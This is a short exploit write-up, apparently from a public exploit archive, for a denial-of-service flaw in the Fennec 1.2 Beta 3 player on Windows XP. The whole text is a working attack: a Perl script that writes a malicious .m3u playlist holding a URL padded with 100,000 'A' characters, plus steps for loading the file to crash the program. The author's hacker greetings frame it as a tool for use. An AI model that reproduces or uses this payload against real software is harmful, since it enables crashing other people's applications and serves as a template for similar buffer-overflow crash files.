# Exploit Title: Fennec 1.2 Beta 3 Denial of Service Vulnerability # Author: d4rk-h4ck3r # Date: 2010-08-19 # Software Link: http://www.brothersoft.com/fennec-download-161571.html # Greetz 2 : PASSEWORD , MadjiX , KAiSER-J , sec4ever , tli7a , All Tun!Sian h4ck3rz # Tested on: Windows XP SP3 Fr # Go to Show conversation add your .m3u file , click start and then boooooooooom ;) my $hd = "#EXTM3U\n"; my $jnk="http://"."\x41" x 100000 ; open(MYFILE,'>>d4rk.m3u'); print MYFILE $hd.$jnk; close(MYFILE);